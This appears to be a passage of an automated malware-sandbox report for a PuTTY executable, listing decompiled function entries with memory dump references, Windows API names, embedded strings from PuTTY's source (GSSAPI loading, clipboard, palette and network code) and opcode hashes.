                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: TextWindow
                                                          • String ID:
                                                          • API String ID: 530164218-0
                                                          • Opcode ID: 44ac266e9b191208401209e93540d9f3f3fcf2c6a84fc755e7e0b5d929b55c00
                                                          • Instruction ID: f4a3adb1fe994bc81f6a990f794b2cfb61c065218c23f4c5f8e1e294891b8228
                                                          • Opcode Fuzzy Hash: 44ac266e9b191208401209e93540d9f3f3fcf2c6a84fc755e7e0b5d929b55c00
                                                          • Instruction Fuzzy Hash: 4811B6A3B0B60591FE256656F040AB9E2909F84B98FAC4534DE8E0B780DE7EE4C1E214
                                                          Function 00007FF738A82550 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: LongWindow
                                                          • String ID:
                                                          • API String ID: 1378638983-0
                                                          • Opcode ID: 6ce3b39f4152cc099674c79a91ec1f8286c91e19a0f42711ece86323b754e4b2
                                                          • Instruction ID: 5b4569ad8ef380f0747db479a173f432bbc3fc477360ae0edb988a6e44f7eb78
                                                          • Opcode Fuzzy Hash: 6ce3b39f4152cc099674c79a91ec1f8286c91e19a0f42711ece86323b754e4b2
                                                          • Instruction Fuzzy Hash: 95F0BE26B00A9452EA019B17ED40A29E7A0FB98FE0F548431DE4C03B64DE38C89B9310
                                                          Function 00007FF738A598EC Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: TextWindow
                                                          • String ID:
                                                          • API String ID: 530164218-0
                                                          • Opcode ID: 602f53644cf09b42f3c91af5402aabfafa940104ebd270313b192af963a05269
                                                          • Instruction ID: 80a9697c0925b91770e77d85c6f802251dbe870c9e6a52800bfb7c59dea586f6
                                                          • Opcode Fuzzy Hash: 602f53644cf09b42f3c91af5402aabfafa940104ebd270313b192af963a05269
                                                          • Instruction Fuzzy Hash: B9E0E563A0A14346E947EA06B4419A99740A7857B0BC44531CF4916280EB3999C7D310
                                                          Function 00007FF738A598B2 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: TextWindow
                                                          • String ID:
                                                          • API String ID: 530164218-0
                                                          • Opcode ID: 18ea4416c87001d69bec55042bd87e61b7ce3f6478e905d2ada5f94e0825f847
                                                          • Instruction ID: 3919171d32f15cd6df888e0a1801be14f96abab20ce4f4c82656532810e6f697
                                                          • Opcode Fuzzy Hash: 18ea4416c87001d69bec55042bd87e61b7ce3f6478e905d2ada5f94e0825f847
                                                          • Instruction Fuzzy Hash: E6E0DF57B0B10252E487EA06B8408A8CB00B789BF17C44931CF4D13380EA3A9AC3F324
                                                          Function 00007FF738A72B00 Relevance: 1.5, APIs: 1, Instructions: 21libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00007FF738AA8CA0: GetSystemDirectoryA.KERNEL32(?,?,?,?,00000000,shell32.dll,00007FF738A72B0E), ref: 00007FF738AA8CB8
                                                            • Part of subcall function 00007FF738AA8CA0: GetSystemDirectoryA.KERNEL32 ref: 00007FF738AA8D13
                                                          • LoadLibraryA.KERNELBASE ref: 00007FF738A72B29
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: DirectorySystem$LibraryLoad
                                                          • String ID:
                                                          • API String ID: 2489551175-0
                                                          • Opcode ID: 0deb760a277a5c0b06a04b77e82c77f7fbd2939edd4237b4cbaaf8f762ab8458
                                                          • Instruction ID: 911de3898cca09f1e090e5359171a82684049e640a589d749654d5010e09030a
                                                          • Opcode Fuzzy Hash: 0deb760a277a5c0b06a04b77e82c77f7fbd2939edd4237b4cbaaf8f762ab8458
                                                          • Instruction Fuzzy Hash: 89E08C06F0A29A62E844732B7D15AA8C2114F8AFE0BC45430DD0D1BF8AEC3E55825324
                                                          Function 00007FF738B039A0 Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: AllocHeap
                                                          • String ID:
                                                          • API String ID: 4292702814-0
                                                          • Opcode ID: 9abff09a7ea2b505c3cd640aabc8993e07eb186e3ce3e3b1df22e2c163f1b2e2
                                                          • Instruction ID: fa57e349b91e21ffc30420bc0c8643d26ead23011e7e7f5e5a8c711773fcc0be
                                                          • Opcode Fuzzy Hash: 9abff09a7ea2b505c3cd640aabc8993e07eb186e3ce3e3b1df22e2c163f1b2e2
                                                          • Instruction Fuzzy Hash: 3FF05E93F0D20365FA5436A25946A75D1806FC97A0FC80634DC3F862C1DF3EE440A23B

                                                          Non-executed Functions

                                                          Function 00007FF738A8C250 Relevance: 114.1, APIs: 36, Strings: 29, Instructions: 355libraryloaderregistryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$Library$Load$Close$Free
                                                          • String ID: AcquireCredentialsHandleA$AddDllDirectory$DeleteSecurityContext$FreeContextBuffer$FreeCredentialsHandle$InitializeSecurityContextA$InstallDir$MakeSignature$QueryContextAttributesA$SOFTWARE\MIT\Kerberos$Using GSSAPI from GSSAPI64.DLL$Using GSSAPI from user-specified library '%s'$Using SSPI from SECUR32.DLL$VerifySignature$\bin$\gssapi64.dll$gss_acquire_cred$gss_delete_sec_context$gss_display_status$gss_get_mic$gss_import_name$gss_init_sec_context$gss_inquire_cred_by_mech$gss_release_buffer$gss_release_cred$gss_release_name$gss_verify_mic$kernel32.dll$secur32.dll
                                                          • API String ID: 1865928206-1296824652
                                                          • Opcode ID: 61125526d41d7ebd9678b1adcbb93cb8fa4587c29732f99b53f238f5de5f6b6d
                                                          • Instruction ID: a6aec1d8220cf963fc8f0e912cb8c5a879270729d9de35d7c30e869a668dc83a
                                                          • Opcode Fuzzy Hash: 61125526d41d7ebd9678b1adcbb93cb8fa4587c29732f99b53f238f5de5f6b6d
                                                          • Instruction Fuzzy Hash: E3F18066A0AB03A1EA44AB11F950AB9F3A0FF45780FC05236CD1E03754EF7EE515E369
                                                          Function 00007FF738A53180 Relevance: 80.9, APIs: 43, Strings: 3, Instructions: 351windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$Rect$Dialog$Object$Text$DestroyMessageMetricsSelectSendSystem$BrushColorCreateFontImageIndirectLoadLongModeShowStock
                                                          • String ID: ($<$PuTTYHostKeyMoreInfo
                                                          • API String ID: 3575920825-529978484
                                                          • Opcode ID: 9d5e5988d1afbcb55599906095ffa566593cbbe469e4eb33d79f0f45132b45ce
                                                          • Instruction ID: bdb66521dea7277953f8b87b0ee4363cf91f4f8cecce442eb91d519e3883d09e
                                                          • Opcode Fuzzy Hash: 9d5e5988d1afbcb55599906095ffa566593cbbe469e4eb33d79f0f45132b45ce
                                                          • Instruction Fuzzy Hash: B3E1D2B260824287F710AB52E85472AF791FBC5B94F404139EE8907F98CFBED4499B14
                                                          Function 00007FF738A38900 Relevance: 74.3, APIs: 26, Strings: 16, Instructions: 807clipboardmemorywindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Global$Clipboard$DataUnlock$AllocByteCharFreeLockMessageMultiSendWide$CloseEmptyFormatOpenRegister
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/window.c$Rich Text Format$\'%02x$\b $\b0 $\cf%d $\highlight%d $\par$\red%d\green%d\blue%d;$\ul $\ulnone $tindex + multilen <= len2${\colortbl ;${\rtf1\ansi\deff0{\fonttbl\f0\fmodern %s;}\f0\fs%d${\uc%d\u%d$}
                                                          • API String ID: 1688594904-1231049551
                                                          • Opcode ID: cb277e48338de9572f4d9381f9e53ec3ef4c44c53c8f4db8894481de00731357
                                                          • Instruction ID: 9e66949f1c0bdc6b0eeae8eb4629cc3d7732ef5d4c9f9211e63d629b06b1ffa0
                                                          • Opcode Fuzzy Hash: cb277e48338de9572f4d9381f9e53ec3ef4c44c53c8f4db8894481de00731357
                                                          • Instruction Fuzzy Hash: DD720573A0E68296EB60AB15E4007BAE391FB85784F884135DE8D03794DFBFE444EB14
                                                          Function 00007FF738A36380 Relevance: 60.4, APIs: 40, Instructions: 438windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Object$SelectText$Delete$CreateMetrics$Font$ColorCompatibleInfo$AlignBitmapCharsetDestroyIconImageLoadModeOutlinePixelReleaseTranslate
                                                          • String ID:
                                                          • API String ID: 2568116128-0
                                                          • Opcode ID: 43b3f33d760fff6471c45e330385d450ffb2ba23c471c62341c74a005e5369b5
                                                          • Instruction ID: 6cf3a2bf6c4380103c5c54bf439547cd66ab31495be6b9947d09447a406daf3c
                                                          • Opcode Fuzzy Hash: 43b3f33d760fff6471c45e330385d450ffb2ba23c471c62341c74a005e5369b5
                                                          • Instruction Fuzzy Hash: CD22D1736096829BE7A4AF21E44476AF7A0FB84B84F804135CB9A43B94DF7EF444DB14
                                                          Function 00007FF738A73280 Relevance: 58.0, APIs: 20, Strings: 13, Instructions: 233windowlibraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Object$CompatibleCreateDeleteErrorLast$AddressBitmapBitsCurrentFormatLibraryLoadMessageProcReleaseSelect
                                                          • String ID: $'%s': unable to open file$($6$BM$BitBlt: %s$CreateCompatibleBitmap: %s$CreateCompatibleDC(desktop window dc): %s$DwmGetWindowAttribute$GetDC(window): %s$GetDIBits (get data): %s$SelectObject: %s$dwmapi.dll
                                                          • API String ID: 2770305857-4119329088
                                                          • Opcode ID: 66009171b8ddf3f40cc6adc9ed46b64b1968a371c64608e07f2d62e374d6f9c7
                                                          • Instruction ID: c0c928eb7bdcce33f91947f255e3a1fb80994d26118abc5d3961f0fd42255a62
                                                          • Opcode Fuzzy Hash: 66009171b8ddf3f40cc6adc9ed46b64b1968a371c64608e07f2d62e374d6f9c7
                                                          • Instruction Fuzzy Hash: B8A1D763B0A68366EA60BB61E454B7AE391BF85780FC44134DD4D03B55EE3EF404A729
                                                          Function 00007FF738A39C70 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 188windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Palette$Select$Object$RealizeReleaseStock$CapsCreateDeviceEntriesUnrealize_set_error_mode
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/window.c$ncolours <= OSC4_NCOLOURS - start$start <= OSC4_NCOLOURS$wgs->term_hwnd
                                                          • API String ID: 997932918-688117120
                                                          • Opcode ID: 92ab84d565a3616a767931b78e6543aa297af0af69523eca760ae4022152b28b
                                                          • Instruction ID: 2c6fc005d7865a3dbb1c3c8779b8da976613ba2b1d5a66c09222978962aa369f
                                                          • Opcode Fuzzy Hash: 92ab84d565a3616a767931b78e6543aa297af0af69523eca760ae4022152b28b
                                                          • Instruction Fuzzy Hash: 84812763A0A24292FB64A726E4407BAE791FF46B90F984131CE4E43391DF7FE451E324
                                                          Function 00007FF738A6B6D0 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 304networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          • /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/network.c, xrefs: 00007FF738A6BA23
                                                          • sock->addr->addresses && sock->step.curraddr < sock->addr->naddresses, xrefs: 00007FF738A6BA1C
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: setsockopt$AsyncHandleInformationSelectclosesocketsocket
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/network.c$sock->addr->addresses && sock->step.curraddr < sock->addr->naddresses
                                                          • API String ID: 221583175-4029205030
                                                          • Opcode ID: 40a4441d638311c04731603ebb3c7f41888fc7ce709856e8b91c67f497efdf7d
                                                          • Instruction ID: 4cb7bf537c0cf75632b5a4872ae715b4d72e854af2d73520894ca55e635efc60
                                                          • Opcode Fuzzy Hash: 40a4441d638311c04731603ebb3c7f41888fc7ce709856e8b91c67f497efdf7d
                                                          • Instruction Fuzzy Hash: E4E1A07360968297EB60AF25E044B6AF3A0FB84B54F804235DB8E43B99DF3EE445D714
                                                          Function 00007FF738A6BC40 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 251networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          • /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/network.c, xrefs: 00007FF738A6BFF2
                                                          • false && "bad address family in sk_newlistener_internal", xrefs: 00007FF738A6BFEB
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: closesocket$ErrorLast$HandleInformationbindgetaddrinfohtonslistensetsockoptsocket
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/network.c$false && "bad address family in sk_newlistener_internal"
                                                          • API String ID: 2773167020-2570758398
                                                          • Opcode ID: 07b0fe020befb43f80ee91646e6614c7a1c01ec91f48ef4b9e5d20a540a4085e
                                                          • Instruction ID: 1d3acc2cf68c866232c67b7e0077792d80eabd00355765ab38a3b4667e37c94f
                                                          • Opcode Fuzzy Hash: 07b0fe020befb43f80ee91646e6614c7a1c01ec91f48ef4b9e5d20a540a4085e
                                                          • Instruction Fuzzy Hash: D5B1E523A0974292EB60AB11A40077AE3A1FF85B90F904235DB9E037E9DF7FE4459719
                                                          Function 00007FF738A37710 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 152windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
